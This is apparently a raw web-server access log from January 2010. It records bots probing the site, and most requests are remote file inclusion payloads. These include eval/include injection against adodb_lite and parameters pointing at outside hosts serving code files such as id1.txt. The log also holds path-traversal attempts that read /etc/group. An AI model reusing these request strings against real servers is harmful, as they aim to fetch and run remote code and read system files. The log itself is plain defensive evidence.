212.175.5.130 - - [05/Jan/2010:02:09:35 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:02:09:35 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:02:09:44 -0500] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:10:13 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:10:13 -0500] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:10:13 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:10:18 -0500] "GET /logs/access_log.Q109103100/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:10:36 -0500] "GET /logs/access_log.Q109062200%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:10:36 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:10:36 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:02:10:40 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
188.93.208.12 - - [05/Jan/2010:02:10:40 -0500] "GET /logs/access_log.Q109103100%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:12:36 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://via.wen.ru/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:12:36 -0500] "GET /logs/access_log.Q109112100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://via.wen.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:12:36 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://via.wen.ru/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:12:42 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://via.wen.ru/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:12:42 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://via.wen.ru/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:12:42 -0500] "GET /logs/access_log.Q109112100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://via.wen.ru/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:02:12:58 -0500] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:02:13:07 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:02:13:07 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:02:13:07 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:02:13:10 -0500] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:14 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:14 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:14 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:14 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:14 -0500] "GET /logs/access_log.Q109112100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:14 -0500] "GET /logs/access_log.Q109112100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:37 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:37 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:37 -0500] "GET /logs/access_log.Q109112100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:40 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:40 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:40 -0500] "GET /logs/access_log.Q109112100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:41 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:41 -0500] "GET /logs/access_log.Q109112100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:41 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:44 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:44 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:02:13:44 -0500] "GET /logs/access_log.Q109112100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:14:17 -0500] "GET /logs/access_log.Q109082000//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:14:17 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:14:17 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:14:24 -0500] "GET /logs/xGB.php?act=admin&do=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:14:24 -0500] "GET /logs/access_log.Q109110300/xGB.php?act=admin&do=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:14:24 -0500] "GET /xGB.php?act=admin&do=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:14:28 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:14:28 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:14:28 -0500] "GET /logs/access_log.Q109082000//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:02:14:52 -0500] "GET /xGB.php?act=admin&do=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:02:14:52 -0500] "GET /logs/access_log.Q109110300%20%20/xGB.php?act=admin&do=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:02:14:52 -0500] "GET /logs/xGB.php?act=admin&do=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:14:56 -0500] "GET /logs/access_log.Q109110300%20%20/xGB.php?act=admin&do=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:14:56 -0500] "GET /xGB.php?act=admin&do=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:14:56 -0500] "GET /logs/xGB.php?act=admin&do=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:02:15:07 -0500] "GET /logs/access_log.Q109111800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:02:15:07 -0500] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:02:15:34 -0500] "GET /logs/access_log.Q109072900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
72.55.143.249 - - [05/Jan/2010:02:15:49 -0500] "GET /logs/access_log.Q109110100%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:15:49 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:15:49 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:02:15:50 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.34.177.222 - - [05/Jan/2010:02:16:31 -0500] "GET /logs/access_log.Q109092200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:16:52 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:16:52 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:16:52 -0500] "GET /logs/access_log.Q109081600//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:16:52 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:16:52 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:16:52 -0500] "GET /logs/access_log.Q109081600//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.155.61.14 - - [05/Jan/2010:02:16:59 -0500] "GET /logs/access_log.Q109061100/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.155.61.14 - - [05/Jan/2010:02:16:59 -0500] "GET /logs/access_log.Q109061100/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.155.61.14 - - [05/Jan/2010:02:17:00 -0500] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.155.61.14 - - [05/Jan/2010:02:17:00 -0500] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
125.248.104.130 - - [05/Jan/2010:02:17:01 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:17:01 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:17:01 -0500] "GET /logs/access_log.Q109051700//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.155.61.14 - - [05/Jan/2010:02:17:02 -0500] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.155.61.14 - - [05/Jan/2010:02:17:02 -0500] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
125.248.104.130 - - [05/Jan/2010:02:17:03 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:17:03 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:17:03 -0500] "GET /logs/access_log.Q109051700//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:17:07 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:17:07 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:17:07 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:17:07 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:17:19 -0500] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:17:19 -0500] "GET //index.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:17:19 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:17:20 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:17:23 -0500] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:17:23 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:17:23 -0500] "GET //index.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:17:24 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:17:28 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:17:28 -0500] "GET /logs/access_log.Q109052300%20%20//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:17:29 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:17:29 -0500] "GET /logs/access_log.Q109052300%20%20//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:17:43 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:17:44 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:17:44 -0500] "GET /logs/access_log.Q109120100//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:17:48 -0500] "GET /logs/access_log.Q109052300//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:18:05 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:18:05 -0500] "GET /logs/access_log.Q109052300%20%20//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:18:16 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:18:24 -0500] "GET /logs/error_log.Q109120100%20%20//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:18:57 -0500] "GET /logs/error_log.Q109120100%20%20//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:19:00 -0500] "GET //index.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:19:00 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:02:19:00 -0500] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://via.wen.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:19:10 -0500] "GET /logs/error_log.Q109120100%20%20//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:02:19:16 -0500] "GET /logs/access_log.Q109092200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:02:19:21 -0500] "GET /logs/error_log.Q109052600 HTTP/1.0" 200 2963699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.110.2 - - [05/Jan/2010:02:19:44 -0500] "GET /logs/access_log.Q109051100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 260 "-" "-"
74.53.110.2 - - [05/Jan/2010:02:19:44 -0500] "GET /logs/access_log.Q109051100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 260 "-" "-"
74.53.110.2 - - [05/Jan/2010:02:19:50 -0500] "GET /logs/error_log.Q109100200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 259 "-" "-"
74.53.110.2 - - [05/Jan/2010:02:19:50 -0500] "GET /logs/error_log.Q109100200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 259 "-" "-"
67.195.114.54 - - [05/Jan/2010:02:19:22 -0500] "GET /logs/error_log.Q109052600 HTTP/1.0" 200 2963699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
